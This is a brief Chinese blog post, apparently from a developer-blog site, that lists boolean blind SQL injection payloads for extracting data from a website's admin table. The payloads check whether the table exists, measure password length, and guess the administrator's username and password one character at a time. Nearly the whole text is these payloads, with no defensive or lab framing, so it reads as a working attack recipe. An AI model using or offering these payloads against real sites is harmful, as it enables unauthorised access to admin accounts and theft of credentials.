本文通过一系列SQL语句示例,展示了如何利用SQL注入漏洞获取敏感信息,包括管理员列表、密码长度、用户名等,并提供了针对特定字段如站长ID及密码的具体测试方法。
and 1=1
and 1=2
管理员列表 and 1 = (select min(id) from admin)
密码长度 and 1 = (select min(id) from admin where len(password)>5)
用户名 and 1=(select min(id) from admin where left(username,1)='1')
站长ID
测试ID and 1=(select min(id) from admin where left(username,6)='站长ID')
密码 and 1=(select min(id) from admin where left(password,1)='1')
登陆地址
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
